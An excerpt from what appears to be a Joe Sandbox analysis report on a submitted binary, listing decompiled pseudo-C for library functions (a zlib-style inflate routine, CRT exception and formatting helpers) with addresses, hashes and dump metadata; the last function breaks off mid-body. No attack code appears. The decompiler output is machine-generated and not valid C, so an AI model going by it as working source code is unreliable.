                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C49E20 Relevance: 4.1, Strings: 3, Instructions: 384COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                                              			E00007FF77FF735C49E20(void* __edx, void* __esi, void* __rax, signed int __rcx, void* __r10, void* __r11, void* _a8, unsigned int _a16, intOrPtr _a24, intOrPtr _a32) {
				signed long long _v88;
				signed long long _v96;
				long long _v104;
				long long _v112;
				unsigned int _t114;
				signed char _t116;
				signed char _t129;
				signed char _t131;
				signed int _t142;
				signed int _t159;
				intOrPtr _t161;
				unsigned int _t167;
				unsigned int _t174;
				signed char _t184;
				signed char _t188;
				signed char _t190;
				signed char _t196;
				signed char _t200;
				signed char _t203;
				void* _t210;
				signed char _t222;
				signed char _t229;
				signed char _t230;
				signed int _t236;
				signed char _t237;
				signed char _t258;
				void* _t270;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				signed long long _t286;
				long long _t289;
				signed long long _t292;
				signed char* _t297;
				signed long long _t298;
				signed long long _t300;
				long long* _t304;
				void* _t305;
				signed char* _t311;
				signed char* _t312;
				signed char* _t313;
				signed char* _t314;
				signed char* _t315;
				signed char* _t316;
				void* _t319;
				signed int* _t320;
				char* _t322;
				char* _t323;
				char* _t324;
				signed int* _t325;
				signed int* _t326;
				signed int* _t327;
				signed int* _t328;
				signed int* _t329;
				signed int* _t330;
				signed int* _t331;
				signed int* _t332;
				signed int* _t333;
				long long _t334;
				signed char* _t335;
				signed char* _t339;
				signed char* _t344;
				signed char* _t345;
				intOrPtr _t350;
				intOrPtr _t351;
				signed char* _t352;

				_a8 = __rcx;
				_t320 = _t319 - 0x38;
				_t351 =  *((intOrPtr*)(__rcx + 0x28));
				_t322 =  *((intOrPtr*)(__rcx + 0x10));
				_t311 =  *__rcx;
				_t286 = __rax + _t311;
				_t334 =  *((intOrPtr*)(_t351 + 0x68));
				r14d =  *((intOrPtr*)(_t351 + 0x3c));
				_t352 =  *((intOrPtr*)(_t351 + 0x40));
				r11d =  *(_t351 + 0x4c);
				_t350 =  *((intOrPtr*)(_t351 + 0x60));
				_v96 = _t286;
				_t300 = _t322 - _t286;
				_v104 = _t305 + _t322;
				_a16 =  *((intOrPtr*)(_t351 + 0x34));
				_v88 = _t300;
				_a32 =  *((intOrPtr*)(_t351 + 0x38));
				_v112 = _t334;
				_a24 = (1 <<  *(_t351 + 0x74)) - 1;
				 *_t320 = 1;
				if (r11d - 0xf >= 0) goto 0x35c49ee8;
				_t312 =  &(_t311[2]);
				r11d = r11d + 0x10;
				_t292 = __rcx & _t286;
				_t114 =  *(_t350 + _t292 * 4);
				_t184 = _t114 >> 0x00000008 & 0x000000ff;
				r11d = r11d - _t184;
				_t222 = _t114 & 0x000000ff;
				if (_t114 == 0) goto 0x35c49f4c;
				r10d = _t114;
				r10d = r10d >> 0x10;
				if ((_t222 & 0x00000010) != 0) goto 0x35c49f5a;
				if ((_t222 & 0x00000040) != 0) goto 0x35c4a23f;
				_t116 =  *(_t350 + _t300 * 4);
				r10d = _t116;
				_t188 = _t116 >> 0x00000008 & 0x000000ff;
				r11d = r11d - _t188;
				r10d = r10d >> 0x10;
				_t258 = _t116;
				if (_t258 != 0) goto 0x35c49f10;
				 *_t322 = _t116 >> 0x10;
				_t323 = _t322 + 1;
				goto 0x35c4a22b;
				_t229 = _t116 & 0xf;
				if (_t258 == 0) goto 0x35c49f87;
				if (r11d - _t229 >= 0) goto 0x35c49f75;
				_t313 =  &(_t312[1]);
				_t167 = ( *(_t351 + 0x48) + (( *_t311 & 0x000000ff) << r11d) + ((_t311[1] & 0x000000ff) << __r11 + 8) >> _t184 >> _t188) + (( *_t312 & 0x000000ff) << r11d);
				r11d = r11d + 8;
				_t190 = _t229;
				r10d = r10d + ((0x00000001 << _t190) - 0x00000001 & _t167);
				r11d = r11d - _t229;
				if (r11d - 0xf >= 0) goto 0x35c49fab;
				_t314 =  &(_t313[2]);
				r11d = r11d + 0x10;
				_t129 =  *(_t334 + (_t292 & _t286) * 4);
				r9d = _t129;
				_t196 = _t129 >> 0x00000008 & 0x000000ff;
				r11d = r11d - _t196;
				_t230 = _t129 & 0x000000ff;
				r9d = r9d >> 0x10;
				if ((_t230 & 0x00000010) != 0) goto 0x35c4a013;
				if ((_t230 & 0x00000040) != 0) goto 0x35c4a26b;
				_t131 =  *(_v112 + _t300 * 4);
				r9d = _t131;
				_t200 = _t131 >> 0x00000008 & 0x000000ff;
				r11d = r11d - _t200;
				_t236 = _t131 & 0x000000ff;
				r9d = r9d >> 0x10;
				if ((_t236 & 0x00000010) == 0) goto 0x35c49fd7;
				_t237 = _t236 & 0x0000000f;
				if (r11d - _t237 >= 0) goto 0x35c4a042;
				r11d = r11d + 8;
				_t315 =  &(_t314[1]);
				if (r11d - _t237 >= 0) goto 0x35c4a042;
				_t174 = ((_t167 >> _t190) + (( *_t313 & 0x000000ff) << r11d) + ((_t313[1] & 0x000000ff) << __r11 + 8) >> _t196 >> _t200) + (( *_t314 & 0x000000ff) << r11d) + (( *_t315 & 0x000000ff) << r11d);
				_t316 =  &(_t315[1]);
				r11d = r11d + 8;
				_t203 = _t237;
				r11d = r11d - _t237;
				if (1 - r8d - _v88 <= 0) goto 0x35c4a1c4;
				if (1 - _a32 <= 0) goto 0x35c4a07e;
				if ( *((intOrPtr*)(_t351 + 0x1be0)) != 0) goto 0x35c4a288;
				if (r14d != 0) goto 0x35c4a0b8;
				r9d = _a16;
				r9d = r9d - 1;
				_t335 = _t334 + _t352;
				_t270 = 1 - r10d;
				if (_t270 >= 0) goto 0x35c4a14b;
				r10d = r10d - 1;
				 *_t323 =  *_t335 & 0x000000ff;
				_t324 = _t323 + 1;
				if (_t270 != 0) goto 0x35c4a0a0;
				goto 0x35c4a143;
				if (r14d - 1 >= 0) goto 0x35c4a115;
				r9d = _a16;
				r9d = r9d + r14d - 1;
				_t272 = 1 - r10d;
				if (_t272 >= 0) goto 0x35c4a14b;
				r10d = r10d - 1;
				 *_t324 =  *( &(( &(_t335[1]))[_t352]) - _t324 + _t324) & 0x000000ff;
				_t325 = _t324 + 1;
				if (_t272 != 0) goto 0x35c4a0e0;
				_t339 = _t352;
				_t273 = r14d - r10d;
				if (_t273 >= 0) goto 0x35c4a14b;
				r10d = r10d - r14d;
				_t142 =  *_t339 & 0x000000ff;
				 *_t325 = _t142;
				_t326 =  &(_t325[0]);
				_t210 = r14d + 0xffffffff;
				if (_t273 != 0) goto 0x35c4a100;
				goto 0x35c4a143;
				r9d = _t142;
				_t274 = _t210 - r10d;
				if (_t274 >= 0) goto 0x35c4a14b;
				r10d = r10d - _t210;
				asm("o16 nop [eax+eax]");
				 *_t326 = ( &(_t339[1]))[_t352] & 0x000000ff;
				_t327 =  &(_t326[0]);
				if (_t274 != 0) goto 0x35c4a130;
				_t344 = _t327 - _t286;
				_t275 = r10d - 2;
				if (_t275 <= 0) goto 0x35c4a19a;
				asm("o16 nop [eax+eax]");
				r10d = r10d + 0xfffffffd;
				 *_t327 =  *_t344 & 0x000000ff;
				_t327[0] = _t344[1] & 0x000000ff;
				_t345 =  &(_t344[3]);
				_t327[0] = _t344[2] & 0x000000ff;
				_t328 =  &(_t327[0]);
				if (_t275 != 0) goto 0x35c4a170;
				if (r10d == 0) goto 0x35c4a221;
				 *_t328 =  *_t345 & 0x000000ff;
				_t329 =  &(_t328[0]);
				if (r10d - 1 <= 0) goto 0x35c4a226;
				 *_t329 = _t345[1] & 0x000000ff;
				_t330 =  &(_t329[0]);
				goto 0x35c4a226;
				_t297 = _t330 - _t286;
				_t298 =  &(_t297[3]);
				 *_t330 =  *_t297 & 0x000000ff;
				r10d = r10d + 0xfffffffd;
				_t330[0] =  *(_t298 - 2) & 0x000000ff;
				_t330[0] =  *(_t298 - 1) & 0x000000ff;
				_t331 =  &(_t330[0]);
				if (r10d - 2 > 0) goto 0x35c4a1d0;
				if (r10d == 0) goto 0x35c4a221;
				 *_t331 =  *_t298 & 0x000000ff;
				_t332 =  &(_t331[0]);
				if (r10d - 1 <= 0) goto 0x35c4a22b;
				 *_t332 =  *(_t298 + 1) & 0x000000ff;
				_t333 =  &(_t332[0]);
				goto 0x35c4a22b;
				if (_t316 - _v96 >= 0) goto 0x35c4a2a5;
				if (_t333 - _v104 >= 0) goto 0x35c4a2a5;
				goto 0x35c49ec4;
				if (( *_t320 & 0x00000020) == 0) goto 0x35c4a256;
				 *((intOrPtr*)(_t351 + 8)) = 0x3f3f;
				goto 0x35c4a2b2;
				 *((long long*)(_a8 + 0x20)) = "invalid literal/length code";
				 *((intOrPtr*)(_t351 + 8)) = 0x3f51;
				goto 0x35c4a2b2;
				 *((long long*)(_a8 + 0x20)) = "invalid distance code";
				 *((intOrPtr*)(_t351 + 8)) = 0x3f51;
				goto 0x35c4a2b2;
				_t289 = "invalid distance too far back";
				 *((long long*)(_a8 + 0x20)) = _t289;
				 *((intOrPtr*)(_t351 + 8)) = 0x3f51;
				goto 0x35c4a2ad;
				_t304 = _a8;
				 *(_t304 + 0x10) = _t333;
				 *((intOrPtr*)(_t304 + 0x18)) = ((0x00000001 << _t203) - 0x00000001 & _t174) + r9d - r8d + 0x101;
				 *_t304 = _t316 - _t289;
				_t159 = _t298 * 8;
				r11d = r11d - _t159;
				_t161 = _t159 - __esi + 5;
				 *((intOrPtr*)(_t304 + 8)) = _t161;
				 *(_t351 + 0x4c) = r11d;
				 *(_t351 + 0x48) = (0x00000001 << r11d) - 0x00000001 & _t174 >> _t203;
				return _t161;
			}






































































                                                                                                                                                                                                                              0x7ff735c49e20
                                                                                                                                                                                                                              0x7ff735c49e31
                                                                                                                                                                                                                              0x7ff735c49e35
                                                                                                                                                                                                                              0x7ff735c49e41
                                                                                                                                                                                                                              0x7ff735c49e48
                                                                                                                                                                                                                              0x7ff735c49e4e
                                                                                                                                                                                                                              0x7ff735c49e51
                                                                                                                                                                                                                              0x7ff735c49e57
                                                                                                                                                                                                                              0x7ff735c49e5b
                                                                                                                                                                                                                              0x7ff735c49e70
                                                                                                                                                                                                                              0x7ff735c49e74
                                                                                                                                                                                                                              0x7ff735c49e78
                                                                                                                                                                                                                              0x7ff735c49e82
                                                                                                                                                                                                                              0x7ff735c49e85
                                                                                                                                                                                                                              0x7ff735c49e8e
                                                                                                                                                                                                                              0x7ff735c49e99
                                                                                                                                                                                                                              0x7ff735c49ea0
                                                                                                                                                                                                                              0x7ff735c49eb5
                                                                                                                                                                                                                              0x7ff735c49eba
                                                                                                                                                                                                                              0x7ff735c49ec1
                                                                                                                                                                                                                              0x7ff735c49ec8
                                                                                                                                                                                                                              0x7ff735c49ee0
                                                                                                                                                                                                                              0x7ff735c49ee4
                                                                                                                                                                                                                              0x7ff735c49eec
                                                                                                                                                                                                                              0x7ff735c49eef
                                                                                                                                                                                                                              0x7ff735c49ef8
                                                                                                                                                                                                                              0x7ff735c49efd
                                                                                                                                                                                                                              0x7ff735c49f00
                                                                                                                                                                                                                              0x7ff735c49f05
                                                                                                                                                                                                                              0x7ff735c49f07
                                                                                                                                                                                                                              0x7ff735c49f0a
                                                                                                                                                                                                                              0x7ff735c49f13
                                                                                                                                                                                                                              0x7ff735c49f18
                                                                                                                                                                                                                              0x7ff735c49f2d
                                                                                                                                                                                                                              0x7ff735c49f36
                                                                                                                                                                                                                              0x7ff735c49f39
                                                                                                                                                                                                                              0x7ff735c49f3e
                                                                                                                                                                                                                              0x7ff735c49f41
                                                                                                                                                                                                                              0x7ff735c49f48
                                                                                                                                                                                                                              0x7ff735c49f4a
                                                                                                                                                                                                                              0x7ff735c49f4f
                                                                                                                                                                                                                              0x7ff735c49f52
                                                                                                                                                                                                                              0x7ff735c49f55
                                                                                                                                                                                                                              0x7ff735c49f5a
                                                                                                                                                                                                                              0x7ff735c49f5d
                                                                                                                                                                                                                              0x7ff735c49f62
                                                                                                                                                                                                                              0x7ff735c49f6c
                                                                                                                                                                                                                              0x7ff735c49f6f
                                                                                                                                                                                                                              0x7ff735c49f71
                                                                                                                                                                                                                              0x7ff735c49f75
                                                                                                                                                                                                                              0x7ff735c49f81
                                                                                                                                                                                                                              0x7ff735c49f84
                                                                                                                                                                                                                              0x7ff735c49f8b
                                                                                                                                                                                                                              0x7ff735c49fa3
                                                                                                                                                                                                                              0x7ff735c49fa7
                                                                                                                                                                                                                              0x7ff735c49fb7
                                                                                                                                                                                                                              0x7ff735c49fc0
                                                                                                                                                                                                                              0x7ff735c49fc3
                                                                                                                                                                                                                              0x7ff735c49fc8
                                                                                                                                                                                                                              0x7ff735c49fcb
                                                                                                                                                                                                                              0x7ff735c49fce
                                                                                                                                                                                                                              0x7ff735c49fd5
                                                                                                                                                                                                                              0x7ff735c49fda
                                                                                                                                                                                                                              0x7ff735c49ff4
                                                                                                                                                                                                                              0x7ff735c49ffc
                                                                                                                                                                                                                              0x7ff735c49fff
                                                                                                                                                                                                                              0x7ff735c4a004
                                                                                                                                                                                                                              0x7ff735c4a007
                                                                                                                                                                                                                              0x7ff735c4a00a
                                                                                                                                                                                                                              0x7ff735c4a011
                                                                                                                                                                                                                              0x7ff735c4a013
                                                                                                                                                                                                                              0x7ff735c4a019
                                                                                                                                                                                                                              0x7ff735c4a023
                                                                                                                                                                                                                              0x7ff735c4a029
                                                                                                                                                                                                                              0x7ff735c4a02f
                                                                                                                                                                                                                              0x7ff735c4a039
                                                                                                                                                                                                                              0x7ff735c4a03b
                                                                                                                                                                                                                              0x7ff735c4a03e
                                                                                                                                                                                                                              0x7ff735c4a042
                                                                                                                                                                                                                              0x7ff735c4a053
                                                                                                                                                                                                                              0x7ff735c4a05d
                                                                                                                                                                                                                              0x7ff735c4a06e
                                                                                                                                                                                                                              0x7ff735c4a078
                                                                                                                                                                                                                              0x7ff735c4a081
                                                                                                                                                                                                                              0x7ff735c4a083
                                                                                                                                                                                                                              0x7ff735c4a08b
                                                                                                                                                                                                                              0x7ff735c4a08e
                                                                                                                                                                                                                              0x7ff735c4a091
                                                                                                                                                                                                                              0x7ff735c4a094
                                                                                                                                                                                                                              0x7ff735c4a09a
                                                                                                                                                                                                                              0x7ff735c4a0a8
                                                                                                                                                                                                                              0x7ff735c4a0ab
                                                                                                                                                                                                                              0x7ff735c4a0b1
                                                                                                                                                                                                                              0x7ff735c4a0b3
                                                                                                                                                                                                                              0x7ff735c4a0c0
                                                                                                                                                                                                                              0x7ff735c4a0c2
                                                                                                                                                                                                                              0x7ff735c4a0cd
                                                                                                                                                                                                                              0x7ff735c4a0d3
                                                                                                                                                                                                                              0x7ff735c4a0d6
                                                                                                                                                                                                                              0x7ff735c4a0d8
                                                                                                                                                                                                                              0x7ff735c4a0e5
                                                                                                                                                                                                                              0x7ff735c4a0e8
                                                                                                                                                                                                                              0x7ff735c4a0ee
                                                                                                                                                                                                                              0x7ff735c4a0f0
                                                                                                                                                                                                                              0x7ff735c4a0f3
                                                                                                                                                                                                                              0x7ff735c4a0f6
                                                                                                                                                                                                                              0x7ff735c4a0fb
                                                                                                                                                                                                                              0x7ff735c4a100
                                                                                                                                                                                                                              0x7ff735c4a108
                                                                                                                                                                                                                              0x7ff735c4a10b
                                                                                                                                                                                                                              0x7ff735c4a10e
                                                                                                                                                                                                                              0x7ff735c4a111
                                                                                                                                                                                                                              0x7ff735c4a113
                                                                                                                                                                                                                              0x7ff735c4a115
                                                                                                                                                                                                                              0x7ff735c4a11b
                                                                                                                                                                                                                              0x7ff735c4a11e
                                                                                                                                                                                                                              0x7ff735c4a120
                                                                                                                                                                                                                              0x7ff735c4a127
                                                                                                                                                                                                                              0x7ff735c4a138
                                                                                                                                                                                                                              0x7ff735c4a13b
                                                                                                                                                                                                                              0x7ff735c4a141
                                                                                                                                                                                                                              0x7ff735c4a148
                                                                                                                                                                                                                              0x7ff735c4a14b
                                                                                                                                                                                                                              0x7ff735c4a14f
                                                                                                                                                                                                                              0x7ff735c4a165
                                                                                                                                                                                                                              0x7ff735c4a174
                                                                                                                                                                                                                              0x7ff735c4a178
                                                                                                                                                                                                                              0x7ff735c4a180
                                                                                                                                                                                                                              0x7ff735c4a189
                                                                                                                                                                                                                              0x7ff735c4a18d
                                                                                                                                                                                                                              0x7ff735c4a191
                                                                                                                                                                                                                              0x7ff735c4a198
                                                                                                                                                                                                                              0x7ff735c4a19d
                                                                                                                                                                                                                              0x7ff735c4a1ac
                                                                                                                                                                                                                              0x7ff735c4a1af
                                                                                                                                                                                                                              0x7ff735c4a1b5
                                                                                                                                                                                                                              0x7ff735c4a1bc
                                                                                                                                                                                                                              0x7ff735c4a1bf
                                                                                                                                                                                                                              0x7ff735c4a1c2
                                                                                                                                                                                                                              0x7ff735c4a1c9
                                                                                                                                                                                                                              0x7ff735c4a1d3
                                                                                                                                                                                                                              0x7ff735c4a1d7
                                                                                                                                                                                                                              0x7ff735c4a1da
                                                                                                                                                                                                                              0x7ff735c4a1e2
                                                                                                                                                                                                                              0x7ff735c4a1ea
                                                                                                                                                                                                                              0x7ff735c4a1ee
                                                                                                                                                                                                                              0x7ff735c4a1f6
                                                                                                                                                                                                                              0x7ff735c4a1fb
                                                                                                                                                                                                                              0x7ff735c4a20a
                                                                                                                                                                                                                              0x7ff735c4a20d
                                                                                                                                                                                                                              0x7ff735c4a213
                                                                                                                                                                                                                              0x7ff735c4a219
                                                                                                                                                                                                                              0x7ff735c4a21c
                                                                                                                                                                                                                              0x7ff735c4a21f
                                                                                                                                                                                                                              0x7ff735c4a230
                                                                                                                                                                                                                              0x7ff735c4a235
                                                                                                                                                                                                                              0x7ff735c4a23a
                                                                                                                                                                                                                              0x7ff735c4a24a
                                                                                                                                                                                                                              0x7ff735c4a24c
                                                                                                                                                                                                                              0x7ff735c4a254
                                                                                                                                                                                                                              0x7ff735c4a25d
                                                                                                                                                                                                                              0x7ff735c4a261
                                                                                                                                                                                                                              0x7ff735c4a269
                                                                                                                                                                                                                              0x7ff735c4a27a
                                                                                                                                                                                                                              0x7ff735c4a27e
                                                                                                                                                                                                                              0x7ff735c4a286
                                                                                                                                                                                                                              0x7ff735c4a290
                                                                                                                                                                                                                              0x7ff735c4a297
                                                                                                                                                                                                                              0x7ff735c4a29b
                                                                                                                                                                                                                              0x7ff735c4a2a3
                                                                                                                                                                                                                              0x7ff735c4a2a5
                                                                                                                                                                                                                              0x7ff735c4a2b5
                                                                                                                                                                                                                              0x7ff735c4a2ca
                                                                                                                                                                                                                              0x7ff735c4a2cd
                                                                                                                                                                                                                              0x7ff735c4a2d0
                                                                                                                                                                                                                              0x7ff735c4a2d7
                                                                                                                                                                                                                              0x7ff735c4a2e6
                                                                                                                                                                                                                              0x7ff735c4a2e9
                                                                                                                                                                                                                              0x7ff735c4a2f0
                                                                                                                                                                                                                              0x7ff735c4a2f4
                                                                                                                                                                                                                              0x7ff735c4a308

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: invalid distance code$invalid distance too far back$invalid literal/length code
                                                                                                                                                                                                                              • API String ID: 0-3255898291
                                                                                                                                                                                                                              • Opcode ID: cd7273432c81b1d5644da5aa9e85e8e412b37ebc6e9da576cb2b07fce7cb4ae2
                                                                                                                                                                                                                              • Instruction ID: 2dc3c5b1c12c4d291362c43ddf013f0ff2968e8ffb25e6591fea4e274aad1e04
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd7273432c81b1d5644da5aa9e85e8e412b37ebc6e9da576cb2b07fce7cb4ae2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67D16873A0C5E39BD71A9F28D805A78BBA3E794B44F448135EE8A437C1CA3CD949D710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C67D98 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 15204871-0
                                                                                                                                                                                                                              • Opcode ID: e2ad5b23be17f232ba81d66d4c2c46b15be3b35b119657490d96248737180ac4
                                                                                                                                                                                                                              • Instruction ID: 99bc3f98da096060950eb22547b98176a50337ec1f207327596da05b778e4038
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2ad5b23be17f232ba81d66d4c2c46b15be3b35b119657490d96248737180ac4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0B15B77600B868BEB19CF29C88636877E0F744F4CF588A21DA5D87BA4CB39D952D710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5C728 Relevance: 2.6, Strings: 2, Instructions: 144COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                                                              			E00007FF77FF735C5C728(void* __ebp, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32, long long _a64) {
				void* _t17;
				long long _t32;
				void* _t42;
				void* _t45;
				void* _t46;

				_t46 = _t42;
				 *((long long*)(_t46 + 8)) = __rbx;
				 *((long long*)(_t46 + 0x10)) = __rbp;
				 *((long long*)(_t46 + 0x18)) = __rsi;
				 *((long long*)(_t46 + 0x20)) = __rdi;
				r13b = r9b;
				_t16 =  >  ? __ebp : 0;
				_t17 = ( >  ? __ebp : 0) + 9;
				if (__rdx - __rax > 0) goto 0x35c5c7b0;
				_t32 = _a64;
				 *((long long*)(_t46 - 0x20)) = _t32;
				r9d = 0;
				 *(_t46 - 0x28) =  *(_t46 - 0x28) & 0x00000000;
				r8d = 0;
				 *((char*)(_t32 + 0x30)) = 1;
				 *((intOrPtr*)(_t32 + 0x2c)) = 0x22;
				E00007FF77FF735C59330(__rax, __rbx, _t32, __rdx, __rsi, r8d, _t45);
				return 0x22;
			}








                                                                                                                                                                                                                              0x7ff735c5c728
                                                                                                                                                                                                                              0x7ff735c5c72b
                                                                                                                                                                                                                              0x7ff735c5c72f
                                                                                                                                                                                                                              0x7ff735c5c733
                                                                                                                                                                                                                              0x7ff735c5c737
                                                                                                                                                                                                                              0x7ff735c5c74d
                                                                                                                                                                                                                              0x7ff735c5c756
                                                                                                                                                                                                                              0x7ff735c5c759
                                                                                                                                                                                                                              0x7ff735c5c761
                                                                                                                                                                                                                              0x7ff735c5c763
                                                                                                                                                                                                                              0x7ff735c5c770
                                                                                                                                                                                                                              0x7ff735c5c774
                                                                                                                                                                                                                              0x7ff735c5c777
                                                                                                                                                                                                                              0x7ff735c5c77c
                                                                                                                                                                                                                              0x7ff735c5c781
                                                                                                                                                                                                                              0x7ff735c5c785
                                                                                                                                                                                                                              0x7ff735c5c78a
                                                                                                                                                                                                                              0x7ff735c5c7af

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                              • Opcode ID: 4f60d2b148f3f000bdcbafeb5d5f282842553cc64aa9beb1dd5d14e804c3656a
                                                                                                                                                                                                                              • Instruction ID: 516016a823506750079864febc49bd3381c20ed6e02a8cdd1a3b827aa7253631
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f60d2b148f3f000bdcbafeb5d5f282842553cc64aa9beb1dd5d14e804c3656a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC5168A3B182C796E7249E769800779EB91F744F98F889631CB984BAC1CF3DD849D710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5EF98 Relevance: 2.0, APIs: 1, Instructions: 462COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                              			E00007FF77FF735C5EF98(void* __ecx, intOrPtr __edx, void* __ebp, signed long long __rax, long long __rbx, signed long long __rcx, void* __rdx, void* __r9, signed char _a8, intOrPtr _a16, long long _a24) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t48;
				void* _t50;
				intOrPtr _t76;
				void* _t84;
				void* _t87;
				void* _t89;
				void* _t92;
				void* _t93;
				signed long long _t114;
				intOrPtr _t116;
				signed long long _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				signed long long _t130;
				signed long long _t132;
				signed long long _t133;
				void* _t159;
				long long _t164;
				signed long long _t165;
				signed long long _t166;
				void* _t174;
				void* _t175;
				void* _t177;
				signed long long _t178;
				signed long long _t179;
				signed long long _t181;
				signed long long _t183;
				intOrPtr* _t184;
				long long _t188;

				_t123 = __rbx;
				_t114 = __rax;
				_a24 = __rbx;
				_a16 = __edx;
				_t188 = __rcx;
				if (__rcx != 0) goto 0x35c5efcc;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				goto 0x35c5f2bf;
				E00007FF77FF735C4B990(__ecx, 0x3d, __rcx, __rcx, __rdx, __r9);
				_t178 = _t114;
				if (_t114 == 0) goto 0x35c5f2ac;
				if (_t114 == __rcx) goto 0x35c5f2ac;
				_t179 =  *0x35c8a9c0; // 0x0
				_t84 = _t179 -  *0x35c8a9d8; // 0x0
				bpl =  *(_t114 + 1);
				_a8 = bpl;
				if (_t84 != 0) goto 0x35c5f019;
				E00007FF77FF735C5F654(__rbx, _t179, __rcx, _t164);
				 *0x35c8a9c0 = _t114;
				r12d = 1;
				if (_t114 != 0) goto 0x35c5f0f2;
				if (__edx == 0) goto 0x35c5f081;
				_t87 =  *0x35c8a9c8 - _t164; // 0x293619a8410
				if (_t87 == 0) goto 0x35c5f081;
				E00007FF77FF735C57B18(_t179, __rcx, _t164);
				if (_t114 != 0) goto 0x35c5f05d;
